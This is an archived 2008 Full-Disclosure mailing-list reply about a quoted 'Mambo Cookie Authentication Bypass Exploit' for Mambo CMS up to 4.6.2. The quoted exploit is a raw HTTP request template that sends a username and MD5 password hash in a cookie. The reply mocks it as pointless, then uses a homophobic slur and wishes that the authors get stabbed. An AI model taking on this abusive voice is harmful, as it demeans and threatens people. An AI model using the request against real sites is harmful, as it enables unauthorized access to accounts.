[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Mambo Cookie Authentication Bypass Exploit
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] Mambo Cookie Authentication Bypass Exploit
- From: crunkd@xxxxxxxxxxxx
- Date: Tue, 10 Jun 2008 17:05:31 +1000
So to perform this 'bypass' you need the password in the first
place? You absolute fucking morons, the security scene is not for
you. I hope someone stabs you over a food stamp. Faggots.
------------------------------------------------------------
Halabaluza Team Halabaluza Team halabaluza.team at gmail.com
Sun Jun 8 12:29:56 BST 2008
* Previous message: [Full-disclosure] avira update.exe
* Next message: [Full-disclosure] [ GLSA 200806-03 ] Imlib 2:
User-assisted execution of arbitrary code
* Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
for mambo <= 4.5.5 and <= 4.6.2 maybe others
GET http://[TARGET]/index.php
Host: [TARGET]
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5)
Gecko/2008050509 Firefox/3.0b5
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/
plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Connection: keep-alive
Cookie: usercookie[username]=[USERNAME];usercookie[password]=[MD5]
Cache-Control: max-age=0
FREE TIBET!
--
Smart Girls Secret Weapon
Read Unbiased Beauty Product Reviews, Get Helpful Tips, Tricks and Sam
http://tagline.hushmail.com/fc/JKFkuIjyaUM3E9zcp2f7ppavbouTIiiPdCquThperfoYTGho1dzYFq/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/